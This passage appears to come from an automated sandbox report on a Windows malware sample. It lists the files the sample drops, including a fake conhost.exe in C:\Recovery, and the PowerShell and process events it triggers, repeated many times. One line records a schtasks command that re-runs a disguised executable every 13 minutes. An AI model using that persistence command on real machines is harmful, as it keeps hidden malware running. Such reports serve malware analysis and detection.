                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\RGOnlxSA.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\EEJGOfpT.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\twjrRmqB.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\HTUGeMKX.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\mzvrpXvN.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\AfaiVEic.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\pyJigHPD.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\afwLyhfm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\lnWbuaeE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\RmrNprNr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\exStwvKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\UXWdwFYk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\mHfKTHWS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\VZRFxCWH.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\xfqPuAPp.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\gPpSweJV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SDpvGwhv.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\BwYQnKCg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SYQgAPKa.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\SingkCdX.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\BnpyIbbb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\NPXweASH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\swyioMDw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kHClnwJL.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\XjnFxUBI.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kuPmEXym.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\fSOKaeua.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\uuKznmFw.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\XmhcMluo.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\MgnHXjFm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QNGyvuni.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\jybLobci.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\IrkyWqxk.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\FQiXIcGc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\pHCSiMBb.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\ucDhZRLu.log
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\ThILVSlx.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\FAtHPtxq.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\qwPLRqWX.log

                          Boot Survival

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
